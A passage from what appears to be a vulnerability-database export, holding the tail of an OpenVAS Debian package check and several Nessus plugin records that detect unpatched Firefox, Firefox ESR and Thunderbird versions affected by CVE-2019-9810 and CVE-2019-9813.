isdpkgvuln(pkg:\"iceweasel-l10n-ml\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-mr\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ms\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-my\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nb-no\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ne-np\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nl\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-nn-no\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-oc\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-or\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pa-in\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pl\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-br\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-pt-pt\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-rm\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ro\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ru\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-si\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sk\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sl\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-son\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sq\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sr\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-sv-se\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ta\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-te\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-th\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-tr\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-uk\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-ur\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-uz\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-vi\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-xh\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-cn\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\nif(!isnull(res = isdpkgvuln(pkg:\"iceweasel-l10n-zh-tw\", ver:\"60.6.1esr-1~deb8u1\", rls:\"DEB8\"))) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-05-31T20:40:12", "description": "This update upgrades Firefox to version 60.6.1 ESR.\n\nSecurity Fix(es) :\n\n - Mozilla: IonMonkey MArraySlice has incorrect alias\n information (CVE-2019-9810)\n\n - Mozilla: Ionmonkey type confusion with __proto__\n mutations (CVE-2019-9813)", "edition": 8, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-28T00:00:00", "title": "Scientific Linux Security Update : firefox on SL7.x x86_64 (20190327)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "modified": "2019-03-28T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:firefox", "p-cpe:/a:fermilab:scientific_linux:firefox-debuginfo", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20190327_FIREFOX_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/123436", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123436);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/29\");\n\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n\n script_name(english:\"Scientific Linux Security Update : firefox on SL7.x x86_64 (20190327)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update upgrades Firefox to version 60.6.1 ESR.\n\nSecurity Fix(es) :\n\n - Mozilla: IonMonkey MArraySlice has incorrect alias\n information (CVE-2019-9810)\n\n - Mozilla: Ionmonkey type confusion with __proto__\n mutations (CVE-2019-9813)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1903&L=SCIENTIFIC-LINUX-ERRATA&P=14184\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e807e094\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected firefox and / or firefox-debuginfo packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:firefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:firefox-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"firefox-60.6.1-1.el7_6\", allowmaj:TRUE)) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"firefox-debuginfo-60.6.1-1.el7_6\", allowmaj:TRUE)) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"firefox / firefox-debuginfo\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:51:10", "description": "The version of Firefox installed on the remote Windows host is prior\nto 66.0.1. It is, therefore, affected by multiple vulnerabilities as\nreferenced in the mfsa2019-09 advisory.\n\n - Incorrect alias information in IonMonkey JIT compiler\n for Array.prototype.slice method may lead to missing\n bounds check and a buffer overflow. (CVE-2019-9810)\n\n - Incorrect handling of __proto__ mutations may lead to\n type confusion in IonMonkey JIT code and can be\n leveraged for arbitrary memory read and write.\n (CVE-2019-9813)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 19, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-22T00:00:00", "title": "Mozilla Firefox < 66.0.1", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mozilla:firefox"], "id": "MOZILLA_FIREFOX_66_0_1.NASL", "href": "https://www.tenable.com/plugins/nessus/123012", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from Mozilla Foundation Security Advisory mfsa2019-09.\n# The text itself is copyright (C) Mozilla Foundation.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123012);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2020/01/31\");\n\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_xref(name:\"MFSA\", value:\"2019-09\");\n\n script_name(english:\"Mozilla Firefox < 66.0.1\");\n script_summary(english:\"Checks the version of Firefox.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Firefox installed on the remote Windows host is prior\nto 66.0.1. It is, therefore, affected by multiple vulnerabilities as\nreferenced in the mfsa2019-09 advisory.\n\n - Incorrect alias information in IonMonkey JIT compiler\n for Array.prototype.slice method may lead to missing\n bounds check and a buffer overflow. (CVE-2019-9810)\n\n - Incorrect handling of __proto__ mutations may lead to\n type confusion in IonMonkey JIT code and can be\n leveraged for arbitrary memory read and write.\n (CVE-2019-9813)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-09/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mozilla Firefox version 66.0.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9813\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/22\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Firefox/Version\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nport = get_kb_item(\"SMB/transport\");\nif (!port) port = 445;\n\ninstalls = get_kb_list(\"SMB/Mozilla/Firefox/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"Firefox\");\n\nmozilla_check_version(installs:installs, product:'firefox', esr:FALSE, fix:'66.0.1', severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:50:52", "description": "The version of Firefox ESR installed on the remote Windows host is\nprior to 60.6.1. It is, therefore, affected by multiple\nvulnerabilities as referenced in the mfsa2019-10 advisory.\n\n - Incorrect alias information in IonMonkey JIT compiler\n for Array.prototype.slice method may lead to missing\n bounds check and a buffer overflow. (CVE-2019-9810)\n\n - Incorrect handling of __proto__ mutations may lead to\n type confusion in IonMonkey JIT code and can be\n leveraged for arbitrary memory read and write.\n (CVE-2019-9813)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 19, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-27T00:00:00", "title": "Mozilla Firefox ESR < 60.6.1", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mozilla:firefox_esr"], "id": "MOZILLA_FIREFOX_60_6_1_ESR.NASL", "href": "https://www.tenable.com/plugins/nessus/123134", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from Mozilla Foundation Security Advisory mfsa2019-10.\n# The text itself is copyright (C) Mozilla Foundation.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123134);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2020/01/31\");\n\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_xref(name:\"MFSA\", value:\"2019-10\");\n\n script_name(english:\"Mozilla Firefox ESR < 60.6.1\");\n script_summary(english:\"Checks the version of Firefox ESR.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Firefox ESR installed on the remote Windows host is\nprior to 60.6.1. It is, therefore, affected by multiple\nvulnerabilities as referenced in the mfsa2019-10 advisory.\n\n - Incorrect alias information in IonMonkey JIT compiler\n for Array.prototype.slice method may lead to missing\n bounds check and a buffer overflow. (CVE-2019-9810)\n\n - Incorrect handling of __proto__ mutations may lead to\n type confusion in IonMonkey JIT code and can be\n leveraged for arbitrary memory read and write.\n (CVE-2019-9813)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-10/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mozilla Firefox ESR version 60.6.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9813\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox_esr\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Firefox/Version\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nport = get_kb_item(\"SMB/transport\");\nif (!port) port = 445;\n\ninstalls = get_kb_list(\"SMB/Mozilla/Firefox/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"Firefox\");\n\nmozilla_check_version(installs:installs, product:'firefox', esr:TRUE, fix:'60.6.1', min:'60.0.0', severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:53:11", "description": "The version of Thunderbird installed on the remote Windows host is\nprior to 60.6.1. It is, therefore, affected by multiple\nvulnerabilities as referenced in the mfsa2019-12 advisory.\n\n - Incorrect alias information in IonMonkey JIT compiler\n for Array.prototype.slice method may lead to missing\n bounds check and a buffer overflow. (CVE-2019-9810)\n\n - Incorrect handling of __proto__ mutations may lead to\n type confusion in IonMonkey JIT code and can be\n leveraged for arbitrary memory read and write.\n (CVE-2019-9813)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 19, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-29T00:00:00", "title": "Mozilla Thunderbird < 60.6.1", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mozilla:thunderbird"], "id": "MOZILLA_THUNDERBIRD_60_6_1.NASL", "href": "https://www.tenable.com/plugins/nessus/123509", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from Mozilla Foundation Security Advisory mfsa2019-12.\n# The text itself is copyright (C) Mozilla Foundation.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123509);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2020/01/24\");\n\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_xref(name:\"MFSA\", value:\"2019-12\");\n\n script_name(english:\"Mozilla Thunderbird < 60.6.1\");\n script_summary(english:\"Checks the version of Thunderbird.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A mail client installed on the remote Windows host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Thunderbird installed on the remote Windows host is\nprior to 60.6.1. It is, therefore, affected by multiple\nvulnerabilities as referenced in the mfsa2019-12 advisory.\n\n - Incorrect alias information in IonMonkey JIT compiler\n for Array.prototype.slice method may lead to missing\n bounds check and a buffer overflow. (CVE-2019-9810)\n\n - Incorrect handling of __proto__ mutations may lead to\n type confusion in IonMonkey JIT code and can be\n leveraged for arbitrary memory read and write.\n (CVE-2019-9813)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-12/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mozilla Thunderbird version 60.6.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9813\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:thunderbird\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Thunderbird/Version\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nport = get_kb_item(\"SMB/transport\");\nif (!port) port = 445;\n\ninstalls = get_kb_list(\"SMB/Mozilla/Thunderbird/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"Thunderbird\");\n\nmozilla_check_version(installs:installs, product:'thunderbird', esr:FALSE, fix:'60.6.1', severity:SECURITY_WARNING);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T03:21:40", "description": "The version of Firefox ESR installed on the remote macOS or Mac OS X\nhost is prior to 60.6.1. It is, therefore, affected by multiple\nvulnerabilities as referenced in the mfsa2019-10 advisory.\n\n - Incorrect alias information in IonMonkey JIT compiler\n for Array.prototype.slice method may lead to missing\n bounds check and a buffer overflow. (CVE-2019-9810)\n\n - Incorrect handling of __proto__ mutations may lead to\n type confusion in IonMonkey JIT code and can be\n leveraged for arbitrary memory read and write.\n (CVE-2019-9813)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 19, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-27T00:00:00", "title": "Mozilla Firefox ESR < 60.6.1", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-9813", "CVE-2019-9810"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:mozilla:firefox_esr"], "id": "MACOS_FIREFOX_60_6_1_ESR.NASL", "href": "https://www.tenable.com/plugins/nessus/123133", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from Mozilla Foundation Security Advisory mfsa2019-10.\n# The text itself is copyright (C) Mozilla Foundation.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123133);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2020/01/31\");\n\n script_cve_id(\"CVE-2019-9810\", \"CVE-2019-9813\");\n script_xref(name:\"MFSA\", value:\"2019-10\");\n\n script_name(english:\"Mozilla Firefox ESR < 60.6.1\");\n script_summary(english:\"Checks the version of Firefox ESR.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS or Mac OS X host is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Firefox ESR installed on the remote macOS or Mac OS X\nhost is prior to 60.6.1. It is, therefore, affected by multiple\nvulnerabilities as referenced in the mfsa2019-10 advisory.\n\n - Incorrect alias information in IonMonkey JIT compiler\n for Array.prototype.slice method may lead to missing\n bounds check and a buffer overflow. (CVE-2019-9810)\n\n - Incorrect handling of __proto__ mutations may lead to\n type confusion in IonMonkey JIT code and can be\n leveraged for arbitrary memory read and write.\n (CVE-2019-9813)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2019-10/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Mozilla Firefox ESR version 60.6.1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-9813\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:firefox_esr\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_firefox_installed.nasl\");\n script_require_keys(\"MacOSX/Firefox/Version\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nkb_base = 